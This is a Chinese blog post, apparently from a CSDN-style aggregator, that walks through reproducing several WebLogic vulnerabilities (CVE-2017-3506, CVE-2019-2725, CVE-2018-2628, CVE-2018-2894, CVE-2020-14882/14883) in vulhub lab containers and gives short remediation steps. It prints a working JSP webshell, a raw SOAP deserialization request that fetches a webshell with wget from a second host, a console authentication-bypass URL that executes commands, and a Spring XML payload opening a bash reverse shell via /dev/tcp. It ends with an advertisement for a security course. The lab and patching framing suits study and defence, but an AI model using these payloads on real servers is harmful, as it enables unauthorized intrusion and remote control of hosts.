news 2026/4/3 4:20:24

WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
WebLogic漏洞复现(附带修复方法)_weblogic漏洞修复

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,默认端口:7001WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

2.1后台弱口令GetShell

通过弱口令进入后台界面,上传部署war包,getshell

漏洞复现

首先搭建环境,命令如下

cd vulhub-master/weblogic/weak_password docker-compose up -d

然后访问目标的/console/login/LoginForm.jsp 目录进入一个登陆界面,这里的默认账号密码是:weblogic/Oracle@123,我们直接登录

如果出现如下页面,点击主页即可成功登录

然后在主页中点击部署里的安装,然后就可以上传文件了

我们直接上传一个之前制作的war包,jsp木马压缩成zip,修改后缀为war,上传

上传完成后访问我们名为1的war包下的1.jsp文件,成功访问

然后用蚁剑连接

漏洞修复

修改密码为复杂密码

2.2 CVE-2017-3506反序列化漏洞

Weblogic的WLS Security组件对外提供了webserver服务,其中使用了XMLDecoder来解析用户输入的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执行。

漏洞复现

搭建环境命令如下,与2.1中用的环境相同

cd vulhub-master/weblogic/weak_password docker-compose up -d

访问以下目录中的一种,如果有回显如下图,则可以判断wls-wsat组件存在

/wls-wsat/CoordinatorPortType

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/ParticipantPortType

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationRequesterPortType11

然后这里可以利用抓包然后添加请求包,在标签之间分别写存放 jsp 的路径和要写入的 shell来获取shell,也可以直接利用工具,我这里利用工具,在地址中填写目标url然后点击检查即可检测漏洞

此处检测出有漏洞后,点击文件上传,将我们之前搜到的jsp一句话木马复制粘贴上去,然后点击上传文件

一句话木马如下

<%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } } public byte[] base64Decode(String str) throws Exception { try { Class clazz = Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } } %> <% String cls = request.getParameter("passwd"); if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); } %>

显示上传完成后,在工具下方会显示上传文件的路径,我们直接去访问

发现成功访问后用蚁剑连接

漏洞修复

更新到最新版本,打上10271的补丁,对访问wls-wsat的资源进行访问控制

2.3 CVE-2019-2725

wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。

漏洞复现

搭建环境命令如下(与前面一样)

cd vulhub-master/weblogic/weak_password docker-compose up -d

搭建完成后访问/_async/AsyncResponseService 目录,出现如下页面则访问成功,存在漏洞

然后开启抓包,再次访问此页面,将抓到的数据包改为以下内容,其中第一个ip为我们所开环境的IP,第二个ip是公网ip,代码内容是,从公网ip中下载它的一个名为2.txt的文件,到我们环境的/bea_wls_internal/目录下,并确认名字为12121.jsp。修改完成后放包

POST /_async/AsyncResponseService HTTP/1.1 Host: ip:7001 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Connection: close Content-Length: 838 Accept-Encoding: gzip, deflate SOAPAction: Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive content-type: text/xml <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <wsa:Action>xx</wsa:Action> <wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>wget http://ip2/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/12121.jsp </string> </void> </array> <void method="start"/></void> </work:WorkContext> </soapenv:Header><soapenv:Body> <asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>

我这里2.txt的内容是jsp的一句话木马,所以就相当与我们给他上传了一个一句话木马文件,然后去访问/bea_wls_internal/12121.jsp,发现访问成功

漏洞修复

1. 禁⽤bea_wls9_async_response组件;

2. 删除wls9_async_response的war包并重启 ;

3. 禁⽌访问 /_async/* 路径。

2.4 CVE-2018-2628

反序列化命令执⾏漏洞

Weblogic Server中的RMI 通信使⽤T3协议在Weblogic Server和其它Java程序(客户端或者其它 Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应⽤程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端⼝的应⽤上默认开 启, 攻击者可以通过T3协议发送恶意的的反序列化数据, 进⾏反序列化, 实现对存在漏洞的weblogic组件 的远程代码执⾏攻击。

漏洞复现

搭建环境命令如下

cd vulhub-master/weblogic/CVE-2018-2628 docker-compose up -d

访问环境后是404,这次我们需要用到一个工具-liqun,这个工具在onefox工具箱中有

进入工具先选择weblogic,将目标ip填入url中然后点击验证

然后就可以执行命令并上传木马了

上传完成后他会直接将文件路径复制到粘贴板,直接去访问连接就可以

漏洞修复

1. 及时更新补丁 ;

2. 禁⽤T3协议 ;

3. 禁⽌T3端⼝对外开放,或者限制可访问T3端⼝的IP来源。

4. 升级版本

2.5 CVE-2018-2894

WebLogic⽂件任意上传漏洞

Weblogic Web Service Test Page中⼀处任意⽂件上传漏洞,Web Service Test Page 在 “⽣产模式” 下默认不开启,所以该漏洞有⼀定限制。

漏洞复现

搭建环境命令如下

cd vulhub-master/weblogic/CVE-2018-2894 docker-compose up -d

搭建完成后在当前目录运行命令:docker-compose logs | grep password 查看密码

然后访问/console/login/LoginForm.jsp 目录后登录

登陆后点击base_domain,然后点击高级

将启动web服务测试页选项勾选上,然后点击保存

保存后访问目标的/ws_utc/config.do目录,对config.do文件进行配置,将如下内容对其进行替换

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

点击提交后,点击左边的安全→添加,随便设置一个名字后上传一个1.jsp文件,内容为一句话木马

然后右键点击检查选中id这一框,下面就会寻找到一个id值,这是一个时间戳

我们将时间戳与文件名拼接如下目录/ws_utc/css/config/keystore/1722931474218_1.jsp后访问

成功访问后用蚁剑连接

漏洞修复

密码改为强密码

2.6.CVE-2020-14882

WebLogic远程代码执⾏漏洞

CVE-2020-14882 允许远程⽤户绕过管理员控制台组件中的身份验证。 CVE-2020-14883 允许经过身份验证的⽤户在管理员控制台组件上执⾏任何命令。 使⽤这两个漏洞链,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执⾏任 意命令并完全控制主机

漏洞复现

搭建环境

cd vulhub-master/weblogic/CVE-2020-14882 docker-compose up -d

访问目标的/console/login/LoginForm.jsp目录进入管理控制台,需要登录,但是我们直接访问/console/css/%252e%252e%252fconsole.portal 就可以绕过登录认证直接进入

但是此时达到未授权得效果。还未能GetShell。可以利⽤第⼆个漏洞(CVE-2020-14883),远程加载XML ⽂件拿到Shell

先访问/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(“java.lang.Runti me.getRuntime().exec(‘touch%20/tmp/success’);”)目录后,到docker的靶机控制台中查看,命令如下

docker ps //查看靶机进程id docker exec -it 容器id /bin/bash //获得靶机shell ls /tmp 查看文件

这里命令已经成功运⾏,有个success

这种利⽤⽅法只能在 Weblogic 12.2.1 及以上版本中使⽤,因为 10.3.6 没有 class

另一种方法

这里我们创建一个恶意的xml文件,将其提供到Weblogic可以访问得服务器上,内容如下

<?xml version="1.0" encoding="UTF-8" ?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder" init-method="start"> <constructor-arg> <list> <value>bash</value> <value>-c</value> <value><![CDATA[bash -i >& /dev/tcp/ip/4444 0>&1]]></value> </list> </constructor-arg> </bean> </beans>

然后访问以下 URL,Weblogic 将加载此 XML 并执⾏其中的命令

http://ip:7001/console/css/%252e%252e%252fconsole.portal? _nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.File SystemXmlApplicationContext("http://ip:8000/rce.xml")

然后成功反弹到shell

漏洞修复

使weblogic访问不到外网

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。

1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/2 22:15:09

量子化学中的价键理论

在理解化学键的本质时&#xff0c;价键理论&#xff08;Valence Bond Theory, VB&#xff09;是最早建立、同时也是最直观的一套电子结构理论框架。它以电子配对、局域化成键和轨道重叠为基础解释原子如何结合成分子。虽然现代量子化学和分子轨道理论极大拓展了我们对电子结构的…

作者头像 李华
网站建设 2026/3/19 18:43:29

18、OS X系统的进程管理、图形应用启动与网络连接指南

OS X系统的进程管理、图形应用启动与网络连接指南 在使用OS X系统时,我们常常会遇到一些技术难题,比如难以终止的进程、如何方便地启动图形应用程序,以及怎样进行远程网络连接等。下面将为大家详细介绍相关的解决方法和操作技巧。 难以终止的进程处理 有些进程很难被终止…

作者头像 李华
网站建设 2026/3/31 3:58:02

19、文件传输与X11系统使用指南

文件传输与X11系统使用指南 在计算机操作中,我们常常需要在不同计算机之间进行文件传输,同时,OS X系统中的Unix核心也为我们带来了许多强大的开源应用,比如X11系统。下面将详细介绍文件传输的多种方式以及X11系统的相关内容。 1. 文件传输方式 在不同计算机间复制文件是…

作者头像 李华
网站建设 2026/3/20 16:06:35

什么是ddos攻击,如何低成本防御ddos攻击?

若干年前读大学时候我接触的第一门专业课是“网络基础课”&#xff0c;还记得第一节课时老师就以ping命令为切入点介绍DDoS攻击&#xff0c;当时还专门告诉我们要念成“D-D-O-S”&#xff0c;而非“D-DOS”。 时至今日&#xff0c;DDoS攻击依然是网络系统所面临的主要威胁之一…

作者头像 李华
网站建设 2026/4/2 5:52:56

0基础入门网络安全:大学生逆袭高薪的秘密武器!

0 基础入局网络安全&#xff1a;大学生逆袭高薪的秘密武器&#xff01; 宝子们&#xff01;最近我的后台简直要被大学生们的私信“淹没”啦&#xff0c;全是关于网络安全转行的问题。看来大家对未来的职业规划都挺上心的&#xff0c;我特别欣慰&#xff01;今天咱就敞开了好好…

作者头像 李华